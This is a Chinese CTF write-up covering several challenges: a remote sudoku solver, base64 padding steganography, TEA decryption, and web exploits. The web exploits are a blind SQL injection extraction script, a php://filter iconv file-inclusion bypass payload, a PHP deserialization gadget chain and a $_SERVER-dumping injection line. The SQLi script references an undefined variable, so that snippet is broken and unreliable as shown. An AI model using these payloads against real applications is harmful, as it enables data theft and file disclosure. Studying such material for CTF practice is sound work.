2020/08/20 08:34

# 签到

gif分解帧，再看不同色域通道。得到flag

# sudo

import numpy as np
from pwn import *
import time
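def solve(m):
    """Fill in a 9x9 sudoku grid by randomised greedy guessing with restarts.

    On every step the empty cell with the fewest remaining candidates is
    picked and one candidate is written into it at random. When some cell
    runs out of candidates the attempt is thrown away and a fresh copy of
    the puzzle is tried.

    Args:
        m: The puzzle as a list of rows or a NumPy array; empty cells are 0.

    Returns:
        A NumPy array of the same shape with no zero cell left.

    Raises:
        TypeError: If ``m`` is a string.

    Note:
        The restart loop has no upper bound, so a grid that has no solution
        never returns. The grid comes from the remote service, so callers
        that cannot trust it should run this under their own timeout.
    """
    if isinstance(m, str):
        # The pasted listing lost the body of its string branch, so there is
        # no string format to honour; reject it instead of failing on .shape.
        raise TypeError("solve() expects a list of rows or a NumPy array")
    m = np.asarray(m)
    # 0..9 for a 9x9 grid. The 0 never survives the set difference below,
    # because the empty cell itself contributes a 0 to its own row.
    rg = np.arange(m.shape[0] + 1)
    while True:
        mt = m.copy()
        while True:
            d = []
            d_len = []
            for i in range(m.shape[0]):
                for j in range(m.shape[1]):
                    if mt[i, j] != 0:
                        continue
                    box = mt[3 * (i // 3):3 * (i // 3 + 1),
                             3 * (j // 3):3 * (j // 3 + 1)]
                    used = np.union1d(np.union1d(mt[i, :], mt[:, j]), box)
                    possibles = np.setdiff1d(rg, used)
                    d.append([i, j, possibles])
                    d_len.append(len(possibles))
            if not d:
                # No empty cell left: this attempt is complete.
                break
            i, j, p = d[np.argmin(d_len)]
            if len(p) == 0:
                # Dead end: the most constrained cell has no candidate.
                break
            mt[i, j] = np.random.choice(p)
        if np.all(mt != 0):
            break

    print("\nTrail:\n", mt)
    return mt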
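def lllllll():
    """Read one 9x9 puzzle from the remote service, solve it and answer.

    Uses the module-level pwntools tube ``p`` and the ``solve`` function.
    The service prints nine grid rows followed by two lines that are read
    and discarded. Empty cells arrive as ``#`` and are mapped to 0. The
    answer is sent back as the 81 digits of the solved grid, row by row.

    Raises:
        ValueError: If a non-empty row does not hold exactly nine cells or
            a cell is neither ``#`` nor an integer.
    """
    rows = [p.recvline() for _ in range(9)]
    p.recvline()
    p.recvline()
    # pwntools hands back bytes on Python 3; normalise to text before parsing.
    str1 = "".join(
        r.decode("latin-1") if isinstance(r, bytes) else r for r in rows
    )
    print(str1)

    dataline = []
    for a in str1.split("\n"):
        # split() without an argument tolerates leading, trailing and
        # repeated blanks, which remove('') handled only for a single one.
        pp = a.split()
        if not pp:
            continue
        if len(pp) != 9:
            # The grid is remote-controlled input: refuse a malformed row
            # rather than feed a ragged array to the solver.
            raise ValueError("expected 9 cells per row, got %d" % len(pp))
        dataline.append([0 if cell == '#' else int(cell) for cell in pp])
    print(dataline)

    result = solve(dataline)
    s = ''.join(str(int(result[i][j])) for i in range(9) for j in range(9))
    print(s)
    p.sendline(s.encode())
    # Give the service time to print the next round before reading again.
    time.sleep(3)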

if __name__ == "__main__":
    # Connect to the challenge service; lllllll() reads this tube as the
    # module-level name ``p``.
    p = remote("47.93.204.245", "12000")
    # The service asks for three puzzles in a row.
    for _round in range(3):
        lllllll()
    # Hand the connection to the terminal to read whatever comes after.
    p.interactive()


# 熟悉的解密

base64隐写和tea算法

import re

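# Recover data hidden in the padding bits of base64 lines.
#
# A base64 string ending in "==" encodes one final byte in two characters,
# leaving the low 4 bits of the last character unused; one ending in "="
# leaves the low 2 bits unused. Decoders ignore those bits, so they can
# carry a covert payload. A strict decoder that rejects non-zero unused
# bits (non-canonical encodings) closes this channel.
path = './1.txt'
b64char = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
with open(path, 'r') as f:
    cipher = [line.strip() for line in f]

hidden_bits = []
for line in cipher:
    body = line.rstrip('=')
    pad = len(line) - len(body)
    # Blank lines and lines without one or two '=' carry no hidden bits;
    # skipping them also avoids indexing past the start of a short line.
    if not body or pad not in (1, 2):
        continue
    width = 2 * pad  # "=" hides 2 bits, "==" hides 4 bits
    value = b64char.index(body[-1]) & ((1 << width) - 1)
    hidden_bits.append(format(value, '0{}b'.format(width)))

plaintext = ''.join(hidden_bits)
# Regroup into whole bytes; a trailing partial group is dropped.
plaintext = re.findall('.{8}', plaintext)
plaintext = ''.join(chr(int(group, 2)) for group in plaintext)
# Parenthesised form prints the same text on Python 2 and Python 3.
print(plaintext)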

#include <stdio.h>
#include <stdint.h>

//加密函数
/*
 * TEA block encryption, 32 cycles.
 * v: two 32-bit words, encrypted in place.
 * k: four 32-bit key words (128-bit key), read only.
 */
void encrypt(uint32_t* v, uint32_t* k) {
    const uint32_t delta = 0x9e3779b9;   /* key schedule constant */
    uint32_t left = v[0];
    uint32_t right = v[1];
    uint32_t sum = 0;
    unsigned round;

    for (round = 32; round > 0; --round) {
        sum += delta;
        /* Each half is updated from the other half, the running sum and two key words. */
        left  += ((right << 4) + k[0]) ^ (right + sum) ^ ((right >> 5) + k[1]);
        right += ((left  << 4) + k[2]) ^ (left  + sum) ^ ((left  >> 5) + k[3]);
    }

    v[0] = left;
    v[1] = right;
}
//解密函数
/*
 * TEA block decryption, 32 cycles; runs the encryption steps in reverse.
 * v: two 32-bit words, decrypted in place.
 * k: four 32-bit key words (128-bit key), read only.
 */
void decrypt(uint32_t* v, uint32_t* k) {
    const uint32_t delta = 0x9e3779b9;   /* key schedule constant */
    uint32_t left = v[0];
    uint32_t right = v[1];
    /* Starting sum is delta * 32 reduced to 32 bits, i.e. the value the
       encryption loop ends on. */
    uint32_t sum = 0xC6EF3720;
    unsigned round;

    for (round = 32; round > 0; --round) {
        /* Undo the second half-step first, then the first one. */
        right -= ((left  << 4) + k[2]) ^ (left  + sum) ^ ((left  >> 5) + k[3]);
        left  -= ((right << 4) + k[0]) ^ (right + sum) ^ ((right >> 5) + k[1]);
        sum -= delta;
    }

    v[0] = left;
    v[1] = right;
}

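/*
 * Decrypt the challenge's five ciphertext blocks with the fixed key and
 * print each block as 16 hex digits.
 */
int main()
{
    /* Each block is one pair of 32-bit unsigned words; TEA works on one
       pair at a time, so the pairs are decrypted one after another. */
    uint32_t cipher[5][2] = {
        { 4018289233U, 2950320151U },
        { 1771827478U,  493980876U },
        { 1863284879U, 1137797599U },
        { 2759701525U, 3957885055U },
        { 2600866805U,   78850724U }
    };
    /* The key is four 32-bit unsigned words, i.e. 128 bits. */
    uint32_t k[4] = { 11, 22, 33, 44 };
    unsigned b;

    for (b = 0; b < sizeof cipher / sizeof cipher[0]; b++) {
        decrypt(cipher[b], k);
        /* Zero-pad every word to 8 digits: plain %x drops leading zero
           nibbles, which makes the two concatenated words ambiguous.
           The cast keeps the argument type in step with the %lx format. */
        printf("解密后的数据：%08lx%08lx\n",
               (unsigned long)cipher[b][0], (unsigned long)cipher[b][1]);
    }
    return 0;
}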


# WEB部分

## easiestSQLI

import requests
import string
import re
# Boolean-based extraction loop from the write-up. The value of the `id`
# query parameter is a complete SQL comparison, which means the application
# places `id` into its query without binding it as a parameter or checking
# that it is an integer.
# Defensive reading: binding `id` as a typed parameter (or rejecting anything
# that is not an integer) removes the injection point, and request logs show
# this pattern as a long run of requests whose `id` contains SQL function
# calls such as mid(...) and char(...).
r = requests.session()
# {0} is the 1-based character position, {1} the character code compared against.
url = 'http://eci-2ze2wcynh47kqz8clurh.cloudeci1.ichunqiu.com//?id=(mid((select(flag)from(flag)),{0},1)=char({1}))'
strings = string.printable
# 42 positions are probed, one character each.
for i in range(42):
k = i + 1
for c in strings:
# NOTE(review): `j` is not defined in this snippet (the loop variable is `c`),
# so this line raises NameError as pasted.
res = r.get(url.format(k,ord(j)))
# The page answers with the marker 'YES~' when the comparison is true; that
# difference in the response body is the oracle the loop reads.
if re.findall(r'YES~',res.content.decode()):
print(c,end='')
break


## 文件包含绕过

?filename=php://filter/convert.iconv.faUCS-2LE.UCS-2BE/resource=flag.php

## Soitgoes

<?php
// Local copies of the challenge's two classes, used to build a serialized
// object graph. The class and property names must match the target's,
// because serialize() writes them into the output.
//
// Defensive reading: the target passes attacker-supplied data to
// unserialize(). Decoding with ['allowed_classes' => false], or using a
// data-only format such as JSON, keeps __destruct() from running on
// attacker-built objects.
class Seri
{
    public $alize;

    public function __construct($alize)
    {
        $this->alize = $alize;
    }

    // Runs when the object is destroyed, which also happens for an object
    // rebuilt by unserialize().
    public function __destruct()
    {
        $this->alize->getFlag();
    }
}

class Flag
{
    public $f;
    public $t1;
    public $t2;

    function __construct($file)
    {
        echo "Another construction!!";
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    // Re-randomises t2 and shows the file only when t1 still equals it.
    public function getFlag()
    {
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if ($this->t1 !== $this->t2) {
            return;
        }
        if (!isset($this->f)) {
            return;
        }
        echo @highlight_file($this->f, true);
    }
}

$flag = new Flag('flag.php');
// t1 becomes a reference to t2. serialize() records the reference, so the two
// properties remain one variable after unserialize() and the strict
// comparison in getFlag() holds whatever md5(rand()) produces. A check that
// compares two fields of the same deserialized object is therefore no secret.
$flag->t1 = &$flag->t2;
$wrapper = new Seri($flag);
echo(serialize($wrapper));
?>


## inclusion

file_put_contents('res',print_r(\$_SERVER,true));


# 逆向

RE是些什么神仙题啊

js那个好像是KCTF的原题　已经恢复OPCODE了但是时间不够了，还有一个是迷宫问题？

system.out.println打印出的结果也是加密的

9SKj8BfvJD5PcdH+Rh7TIbXwgpC/Nntiq62rWUEaAzQ3ZyVFG4mLoY0l1xOeMkus

00235CFPaeefijlmnrwz

020C5PaeeFlmnjzwrif3

3020fF5CeaPeirjnmlwz

quickjs 那题已经参考KCTF那题还原opcode了 没时间了 QAQ
